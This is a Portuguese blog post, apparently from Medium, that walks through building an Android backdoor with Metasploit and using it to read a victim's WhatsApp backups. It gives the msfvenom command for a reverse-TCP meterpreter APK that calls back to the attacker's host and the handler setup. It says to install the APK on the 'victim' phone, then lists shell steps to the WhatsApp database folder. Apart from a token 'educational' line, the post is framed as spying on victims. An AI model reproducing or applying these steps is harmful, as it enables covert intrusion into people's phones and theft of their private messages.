23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp!

| by Leonardo Marci…

Criando Backdoors para Android utilizando

Metaexploit e obtendo acesso a mensagens de
WhatsApp!
Leonardo Marciano · Seguir
2 minutos de leitura · 3 de março de 2018

Share

Já se imaginou obter acesso a arquivos e até conversas do whatsapp de usuários

Android? neste post iremos utilizar o Meta Exploit framework para criar um
backdoor capaz de coletar informações e arquivos do dispositivo vitima.

Recomendo a todos seguirem este post utilizando Kali Linux, máááásss não é
obrigatório!

Vamos precisar 'apenas' do metaexploit! clique aqui para fazer aprender a instalar e
configurar o metaexploit

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsapp-… 1/12
23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp! | by Leonardo Marci…

Vamos lá!
Vamos começar criando nosso payload, com o terminal aberto, iniciar o msfvenom
e criar um .apk, isso realmente é muito simples de se fazer!

msfvenom -p android/meterpreter/reverse_tcp LHOST=(SEU IP OU DDNS) LPORT=(Porta

que deseja utilizar) R >/root/FILENAME.apk

Onde definimos que nosso target é o android e criamos um server listen, no

comando acima você deve modificar os parâmetros LHOST e LPORT para as de sua
máquina, para exemplos iremos utilizar o ip 172.217.30.78(google) e a porta 3333.
Também é
de extrema importância alterar o parâmetro R> que é o local de despejo de nosso
payload

No nosso caso, ficou assim:

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.217.30.78 LPORT=3333 R
>/root/marciano/payload.apk

Com o apk em mãos, instale no smartphone vitima!

Iniciando um handler
Agora que temos nosso payload instalado no dispositivo vítima, vamos iniciar um
hander para receber e enviar informações ao smartphone!

No terminal, siga as instruções abaixo:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 172.217.30.78
set LPORT 3333
exploit

onde:

msfconsole : inicia uma instância do console MetaExploit.

use exploit/multi/handler : inicia uma instância do handler global do MetaExploit.
set LHOST : define onde será nosso handler, aqui você deve colocar o IP, DDNS de
sua maquina.

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsapp-… 2/12
23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp! | by Leonardo Marci…

set LPORT : define a porta de nosso manipulador

exploit : inicia nossa instância.

Neste ponto você já vai ter acesso aos arquivos do usuário! já pode explorar os
arquivos, obter conversas do whatsapp e fotos.
basta digitar shell e brincar :)

Avançaaaandooooo! que tal interagir com o smartphone da vítima e acessar as

mensagens de seu whatsapp? isso é bem simples após ter o payload conectado!

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsapp-… 3/12
23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp! | by Leonardo Marci…

zapzap, saposao, zap, wetsapo, whatsapo ou saposapo?

Pra isso, vamos com o Payload conectado, apenas iniciar o terminal remoto com o
dispositivo (digitando shell) e navegue até o diretório db do whatsapp, o android é
base linux! Isso significa que você provavelmente deve ter bastante familiaridade
com comandos de navegação.

Vamos lá!
marciano@MARCIANO-NOTE8 ~> shell
marciano@MARCIANO-NOTE8 ~> cd ..
marciano@MARCIANO-NOTE8 ~> cd sdcard/
marciano@MARCIANO-NOTE8 ~> cd whatsapp
marciano@MARCIANO-NOTE8 ~> ls
marciano@MARCIANO-NOTE8 ~> cd backups
marciano@MARCIANO-NOTE8 ~> cd dbs

O arquivo tem o seguinte formato: databackup.db.crypt12 onde databackup é dados

do backup.

Agora você só precisa de um WhatsApp Viewer

Portas abertas para várias possibilidades, esse post foi criado com intenção
educacional!

Créditos: eu

Whatsapp hackear Linux Segurança

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsapp-… 4/12
23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp! | by Leonardo Marci…

Follow

Escrito por Leonardo Marciano

377 Seguidores

Nós sempre nos definimos pela capacidade de superar o impossível. Steemit: @lstark

Mais de Leonardo Marciano

Leonardo Marciano

Fazendo o seu próprio Hardware USB Keylogger q̶u̶a̶s̶e̶ de graça!

Faz um tempinho que não escrevo aqui haha! que tal voltar com uma técnica de herança de
dados eficiente e indetectável por qualquer…

4 minutos de leitura · 15 de janeiro de 2018

171 2

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsapp-… 5/12
23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp! | by Leonardo Marci…

Leonardo Marciano

Engenharia Reversa #1 — Início de uma grande aventura

Você com certeza já quis ser um hacker/cracker, depois que assistiu Mr Robot ficou super
animado para revolucionar o mundo com linhas de…

7 minutos de leitura · 2 de julho de 2017

165 6

Leonardo Marciano

Engenharia
Open in app Reversa #3 — Usando OllyDgb (parte 1) Sign up Sign In
https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsapp-… 6/12
23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp! | by Leonardo Marci…

Neste tutorial, tentarei apresentá-lo ao uso do OllyDBG. Olly tem muitas funções e a única
maneira de realmente aprender todos eles é…

18 minutos de leitura · 4 de julho de 2017

38

Leonardo Marciano

Engenharia Reversa #2 — Introdução ao Olly Debug

Você por aqui? já leu nossa primeira parte né? caso não clique aqui

9 minutos de leitura · 2 de julho de 2017

37 1

Veja tudo de Leonardo Marciano

Recomendado de Médio

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsapp-… 7/12
23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp! | by Leonardo Marci…

Asmae ziani

Engenharia reversa e análise de aplicativos Android: um guia passo a

passo
A engenharia reversa é o processo de desmontar um aplicativo de software para entender
como ele funciona e possivelmente modificá-lo. Isso pode ser…

· 6 minutos de leitura · 26 de dezembro de 2022

274 2

VEEXH em A Folha Detetive

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsapp-… 8/12
23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp! | by Leonardo Marci…

OPERAÇÃO: ESCRITURA DA CAÇA

1º de janeiro de 2023

8 minutos de leitura · 1 de fevereiro

20

Listas

Conhecimento geral de codificação

20 histórias · 18salvamentos

Agora em IA: escolhido a dedo pela Better Programming

248 histórias · 12salvamentos

marketing
102 histórias · 4salvamentos

Escolhas da equipe
361 histórias · 120salvamentos

Fardeen Ahmed

Começando como um Caçador de Recompensas de Insetos: Abordagem

Iniciante, Intermediária e Avançada

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsapp-… 9/12
23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp! | by Leonardo Marci…

Olá pessoal. Este artigo é sobre como começar como um Bug-Bounty Hunter. Este artigo
cobre a maioria das coisas que…

12 minutos de leitura · 21 de janeiro

115 3

Karthikeyan.V em Redações de InfoSec

Hackeando as principais contas do site | Poseidon: fortalecendo o

phishing com uma engenharia social baseada na nuvem…
Uma ferramenta de engenharia social baseada em nuvem que revoluciona os ataques de
phishing com sua GUI, modelos extensos e fácil instalação.

4 minutos de leitura · 9 de junho

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsap… 10/12
23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp! | by Leonardo Marci…

David Pogue

Minha primeira imersão no Apple Vision Pro: Pesado, cara!

Esta manhã, passei meia hora experimentando o fone de ouvido Apple Vision Pro. Aqui está a
conclusão: esta é uma peça alucinante de…

16 minutos de leitura · 7 de junho

6K 130

Mike Takahashi em A área cinzenta

5 Google Dorks que todo hacker deveria saber

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsapp… 11/12
23/06/2023, 13:30 Criando Backdoors para Android utilizando Metaexploit e obtendo acesso a mensagens de WhatsApp! | by Leonardo Marci…

Descubra endpoints ocultos e dados confidenciais usando esses idiotas do Google

· 3 minutos de leitura · 6 de janeiro

646 6

Ver mais recomendações

https://medium.com/@leonardomarciano/criando-backdoors-para-android-utilizando-metaexploit-e-obtendo-acesso-a-mensagens-de-whatsap… 12/12